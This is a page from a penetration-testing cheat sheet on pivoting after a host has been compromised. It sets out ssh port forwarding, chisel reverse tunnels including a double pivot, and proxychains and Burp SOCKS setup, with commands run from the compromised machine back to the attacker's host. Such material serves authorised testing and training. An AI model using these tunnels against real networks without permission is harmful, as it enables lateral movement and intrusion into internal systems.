d4Rk's 1337 h4x0r guide
  • Introduction
  • Reconnaissance
    • Recon
    • OSINT
  • Enumeration
    • Network discovery
    • Port scanning
    • Webserver scanning
    • Exploit detection
    • Fuzzing
    • Process monitoring
  • Exploitation
    • Shells
      • Shells
      • TTY
    • Passwords
      • Hashcat
      • John the Ripper (JTR)
      • Hydra
      • Passwords & credentials
    • Web
      • SQL injection (SQLi)
      • Cross site scripting (XSS)
      • File inclusions (LFI, RFI)
      • Directory traversal
      • Cross site request forgery (CSRF)
      • XML external entity (XXE)
      • Cross origin resource sharing (CORS)
      • Server-side request forgery (SSRF)
      • Server-side template injection (SSTI)
      • Access control vulnerabilities
      • Authentication vulnerabilities
      • JWT attacks
      • File uploads
      • Host header attacks
      • Clickjacking
      • Logic flaws
      • OS command injection
      • HTTP Request smuggling
      • Insecure deserialization
      • DOM-based
      • WebSockets
      • Web cache poisoning
    • Buffer overflow
      • General
      • Linux
      • Windows
    • Misc
      • Evasion
      • SQSH
  • Privilege escalation
    • Linux
      • Overview
    • Windows
      • Overview
      • Mimikatz
      • PowerSploit
      • Juicy Potato, Rotten Potato (NG)
      • JAWS
      • Empire
      • SILENTTRINITY
  • Post exploitation
    • Loot
    • Pivoting
    • Standalone Tools
  • Services
    • TCP
      • TCP 21: FTP
      • TCP 22: SSH
      • TCP 23: Telnet
      • TCP 25, 587: SMTP
      • TCP 53: DNS
      • TCP 80, 443: HTTP(S)
      • TCP 88: Kerberos
      • TCP 110, 995: POP3(S)
      • TCP 111: rpcbind
      • TCP 135: MSRPC
      • TCP 139, 445: NetBIOS, SMB
      • TCP 143, 993: IMAP(S)
      • TCP 389, 636, 3268, 3269: LDAP
      • TCP 1433, UDP 1434: MSSQL Server
      • TCP 2049: NFS
      • TCP 3306: MySQL
      • TCP 3389: RDP
      • TCP 5985: WinRM
      • TCP 6379: Redis
      • TCP 27017: MongoDB
    • UDP
      • UDP 137, 138, TCP 139: NetBIOS
      • UDP 161: SNMP
    • Misc
      • Active Directoy
      • Apache Tomcat
      • Drupal
      • H2 Databases
      • IIS
      • IPsec
      • IRC
      • Java Applets
      • Java RMI
      • Jenkins
      • Joomla
      • Oracle
      • PHP
      • SharePoint
      • WordPress
  • File transfer
    • Overview
    • Wget
    • Pure-FTPd
    • TFTP
    • VBScript: Wget clone
  • Misc
    • Bash
    • Burp Suite
    • Crypto
    • Ebowla
    • Firefox extensions
    • Impacket
    • Memory forensics
    • Metasploit Framework (MSF)
    • MITM
    • Msfvenom
    • Pass the Hash (PTH)
    • PowerShell
    • PowerShell on Linux
    • Wireshark
    • Wordlists and dictionaries
  • Bug Bounty
    • Platforms
    • Tools
Powered by GitBook
On this page
  • Network setup
  • SSH
  • Common options
  • Forward connection (Local port forwarding)
  • Reverse connection (Remote port forwarding)
  • Socks proxy (Dynamic port forwarding)
  • Socks proxy (reverse)
  • Chisel
  • Port forwarding
  • SOCKS proxy
  • Double pivot (via SOCKS proxies)
  • Verify
  • proxychains
  • Config file
  • Burp Suite
  • Foxy Proxy
Edit on GitHub
  1. Post exploitation

Pivoting

Network setup

The following sections rely on this network setup.

┌──────────────┐          ┌──────────────┐            ┌──────────────┐
│ attacking    │          │ compromised  │            │ target       │
│ machine      │          │ machine      │            │ machine      │
│ (local)      │          │ (pivot)      │            │ (target)     │
│              │          │              │            │              │
│  10.10.10.2 ◄┼──public──┼► 10.10.10.5  │            │              │
│              │          │              │            │              │
│              │          │  172.16.0.5 ◄┼──internal──┼► 172.16.0.10 │
│              │          │              │            │              │
└──────────────┘          └──────────────┘            └──────────────┘
Machine name
Short name
User

Attacking Machine

local

me

Compromised Machine

pivot

victim

Target Machine

target

-

SSH

Common options

option
description

-L

Forward connection (Local port forwarding)

-R

Reverse connection (Remote port forwarding)

-D

Socks proxy (Dynamic port forwarding)

-f

Immediately background the shell

-N

Only establish the connection, don't execute any commands

Forward connection (Local port forwarding)

  local                           pivot              target
10.10.10.2                     10.10.10.5          172.16.0.10
                               172.16.0.5
    │                               │                   │
    │                               │                   │
    │ssh -L 1337:172.16.0.10:80     │                   │
    ├──────────────────────────────►│                   │
    │                               │                   │
    │nc 127.0.0.1 1337              │                   │
    ├──────────────────────────────►│        80         │
    │                               ├──────────────────►│
    │                               │                   │

Setup a local port forward to the target.

ssh -L 1337:172.16.0.10:80 victim@10.10.10.5

Execute command

<cmd>

# Example
nc 127.0.0.1 1337

Reverse connection (Remote port forwarding)

  local                           pivot              target
10.10.10.2                     10.10.10.5          172.16.0.10
                               172.16.0.5
    │                               │                   │
    │                               │                   │
    │     ssh -R 1337:172.16.0.10:80│                   │
    │◄──────────────────────────────┤                   │
    │                               │                   │
    │nc 127.0.0.1 1337              │                   │
    ├──────────────────────────────►│        80         │
    │                               ├──────────────────►│
    │                               │                   │

As we will connect back from the target (network) to our own machine, we need to take some precautions to ensure our safety.

  1. Generate a new ssh key pair

ssh-keygen
  1. Add public key to authorized_keys with following restrictions

from="<target-ip>",command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty <pub-key>
  1. Check ssh server status

sudo systemctl status ssh
  1. Start ssh server (if not already running)

sudo systemctl start ssh
  1. Copy the private key over to the pivot ⚠️ Normally we would never give away our private key, but that's why we're using a new throwaway key pair here! ⚠️

Setup a remote port forward from the pivot.

ssh -R 1337:172.16.0.10:80 me@10.10.10.2 -i throwaway-key

Execute command (example)

nc 127.0.0.1 1337

Socks proxy (Dynamic port forwarding)

  local                             pivot              target
10.10.10.2                       10.10.10.5          172.16.0.10
                                 172.16.0.5
    │                                 │                   │
    │                                 │                   │
    │ssh -D 1337 [...]                │                   │
    ├────────────────────────────────►│                   │
    │                                 │                   │
    │proxychains nc 172.16.0.10 any   │                   │
    ├────────────────────────────────►│        any        │
    │                                 ├──────────────────►│
    │                                 │                   │

Setup a proxy that forwards any tcp port to any target.

ssh -D 1337 victim@10.10.10.5

proxychains.conf (see also below)

socks5 127.0.0.1 1337

Execute command (example)

proxychains nc 172.16.0.10 80

Socks proxy (reverse)

  local                             pivot              target
10.10.10.2                       10.10.10.5          172.16.0.10
                                 172.16.0.5
    │                                 │                   │
    │                                 │                   │
    │                ssh -R 1337 [...]│                   │
    │◄────────────────────────────────┤                   │
    │                                 │                   │
    │proxychains nc 172.16.0.10 any   │                   │
    ├────────────────────────────────►│        any        │
    │                                 ├──────────────────►│
    │                                 │                   │
ssh -R 1337 me@10.10.10.2 -i throwaway-key

Chisel

Port forwarding

┌────────┐                   ┌────────┐   ┌────────┐
│ local  │                   │ pivot  │   │ target │
│        │                   │        │   │        │
│  9000 ◄┼──chisel───────────┼► 9000  │   │        │
│        │                   │        │   │        │
│  9001 ─┼──port-forwarding──┼────────┼───┼► 80    │
│        │                   │        │   │        │
└────────┘                   └────────┘   └────────┘
  local                                        pivot              target
10.10.10.2                                  10.10.10.5          172.16.0.10
                                            172.16.0.5
    │                                            │                   │
    │                                            │                   │
    │./chisel server -p 9000 -reverse            │                   │
    ├──┐                                         │                   │
    │  │                                         │                   │
    │◄─┘                                         │                   │
    │                                            │                   │
    │       ./chisel client 10.10.10.2:9000 [...]│                   │
    │◄───────────────────────────────────────────┤                   │
    │                                            │                   │
    │nc 172.16.0.10 9001                         │                   │
    ├───────────────────────────────────────────►│        80         │
    │                                            ├──────────────────►│
    │                                            │                   │

Start server (local)

./chisel server -p 9000 -reverse

Start client (pivot)

./chisel client 10.10.10.2:9000 R:127.0.0.1:9001:172.16.0.10:80

Execute command (example)

nc 172.16.0.10 9001

SOCKS proxy

┌────────┐                   ┌────────┐   ┌────────┐
│ local  │                   │ pivot  │   │ target │
│        │                   │        │   │        │
│  9000 ◄┼──chisel───────────┼► 9000  │   │        │
│        │                   │        │   │        │
│  1080 ─┼──SOCKS─proxy──────┼────────┼───┼► any   │
│        │                   │        │   │        │
└────────┘                   └────────┘   └────────┘
  local                                        pivot              target
10.10.10.2                                  10.10.10.5          172.16.0.10
                                            172.16.0.5
    │                                            │                   │
    │                                            │                   │
    │./chisel server -p 9000 -reverse            │                   │
    ├──┐                                         │                   │
    │  │                                         │                   │
    │◄─┘                                         │                   │
    │                                            │                   │
    │     ./chisel client 10.10.10.2:9000 R:socks│                   │
    │◄───────────────────────────────────────────┤                   │
    │                                            │                   │
    │proxychains nc 172.16.0.10 any              │                   │
    ├───────────────────────────────────────────►│        any        │
    │                                            ├──────────────────►│
    │                                            │                   │

Start server (local)

./chisel server -p 9000 -reverse

Start client (pivot)

./chisel client 10.10.10.2:9000 R:socks

Note: <socks-port> defaults to 1080, if left out.

Execute command (example)

proxychains nc 172.16.0.10 80

Double pivot (via SOCKS proxies)

┌─subnet1───────────────────────────┐┌─subnet2───────────────────┐┌─subnet3───────────────┐
│                                   ││                           ││                       │
│  ┌─local──┐                   ┌─pivot1─┐                   ┌─pivot2─┐       ┌─target─┐  │
│  │        │                   │        │                   │        │       │        │  │
│  │  9000 ◄├──chisel───────────┤► 9000  │                   │        │       │        │  │
│  │        │                   │        │                   │        │       │        │  │
│  │        │                   │  9001 ◄├──chisel───────────┤► 9001  │       │        │  │
│  │        │                   │        │                   │        │       │        │  │
│  │  1080 ─┼──SOCKS─proxy──────┼────────┼─► any             │        │       │        │  │
│  │        │                   │        │                   │        │       │        │  │
│  │  1081 ─┼───────────────────┼────────┼──SOCKS─proxy──────┼────────┼─► any │        │  │
│  │        │                   │        │                   │        │       │        │  │
│  └────────┘                   └────────┘                   └────────┘       └────────┘  │
│                                   ││                           ││                       │
└───────────────────────────────────┘└───────────────────────────┘└───────────────────────┘
┌─subnet1───────────────────────────────────────┐┌─subnet2───────────────────────────────────┐┌─subnet3───────────────┐

  local                                        pivot                                       pivot2              target
10.10.10.2                                  10.10.10.5                                   172.16.0.10         172.16.1.20
                                            172.16.0.5                                   172.16.1.10         
    │                                            │                                            │                   │
    │                                            │                                            │                   │
    │./chisel server -p 9000 -reverse            │                                            │                   │
    ├──┐                                         │                                            │                   │
    │  │                                         │                                            │                   │
    │◄─┘                                         │                                            │                   │
    │                                            │                                            │                   │
    │     ./chisel client 10.10.10.2:9000 R:socks│                                            │                   │
    │◄───────────────────────────────────────────┤                                            │                   │
    │                                            │                                            │                   │
    │                                            │./chisel server -p 9001 -reverse            │                   │
    │                                            ├──┐                                         │                   │
    │                                            │  │                                         │                   │
    │                                            │◄─┘                                         │                   │
    │                                            │                                            │                   │
    │                                            │     ./chisel client 172.16.0.5:9001 R:socks│                   │
    │                                            │◄───────────────────────────────────────────┤                   │
    │                                            │                                            │                   │
    │                                            │                                            │                   │
    │                                            │                                            │                   │
    │proxychains nc <target-ip> any              │                                            │                   │
    ├───────────────────────────────────────────►│        any                                 │                   │
    │                                            ├───────────────────────────────────────────►│        any        │
    │                                            │                                            ├──────────────────►│
    │                                            │                                            │                   │

Start server (local)

./chisel server -p 9000 -reverse

Start client (pivot1)

./chisel client 10.10.10.2:9000 R:socks

Start another server (pivot1)

./chisel server -p 9001 -reverse

Start another client (pivot2)

./chisel client 172.16.0.5:9001 R:socks

Add another proxy to proxychains.conf (more details on proxychains, see below)

socks5 127.0.0.1 1080
socks5 127.0.0.1 1081

Execute command (example)

proxychains nc 172.16.1.20 80

Verify

netstat -tulpn

E.g.

[...]
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:1337          0.0.0.0:*               LISTEN      50883/ssh
tcp6       0      0 ::1:1337                :::*                    LISTEN      50883/ssh
[...]

proxychains

Config file

Proxychains looks for configuration in the following order:

  1. Env

  2. -f proxychains.conf

  3. ./proxychains.conf

  4. ~/.proxychains/proxychains.conf

  5. /etc/proxychains.conf

socks5 127.0.0.1 1080

Run command via proxychains

proxychains <cmd>

Burp Suite

To use Burp Suite in this setup, just configure the socks proxy there.

Project options or User options → SOCKS Proxy → ☑️ Use SOCKS Proxy

  • SOCKS proxy host: 127.0.0.1

  • SOCKS proxy port: 1080

⚠️ Keep your browser pointing to Burp Suites' proxy as usual! ⚠️

Foxy Proxy

PreviousLootNextStandalone Tools

Last updated 3 years ago

A fast TCP/UDP tunnel over HTTP

A tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4, SOCKS5 or HTTP(S) proxy.

See

GitHub - jpillora/chisel
GitHub - haad/proxychains: proxychains
Firefox extensions